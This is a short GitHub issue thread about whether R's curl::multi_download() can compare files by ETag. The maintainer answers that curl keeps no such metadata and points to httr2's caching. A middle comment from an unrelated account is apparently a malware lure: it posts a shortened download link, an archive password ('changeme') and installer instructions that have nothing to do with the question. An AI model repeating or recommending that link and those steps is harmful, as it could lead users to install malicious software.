### ISSUE TITLE
Check ETag of file / url in curl::multi_download()

### ISSUE THREAD

**Issue by rafapereirabr** [jeroen/curl#344]
Hi all. As far as I understand, the `curl::multi_download()` function compares the size of the file at the `url` and the local version of the file if the file has already been downloaded. Is there a way to compare the url and local files based on ETag?

[I believe my questions is similar to this one I've found on StackOverflow](https://stackoverflow.com/questions/77096582/use-etag-compare-and-save-with-r-curlmulti-download).

ps. Thanks for such a great package!

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jeroen** [comment]
curl does not store any metadata like this, so you will have to do that yourself if you want to implement this. I think httr2 does  caching based on etag https://r-lib.r-universe.dev/httr2/doc/manual.html#req_cache but that may not help for file downloads.
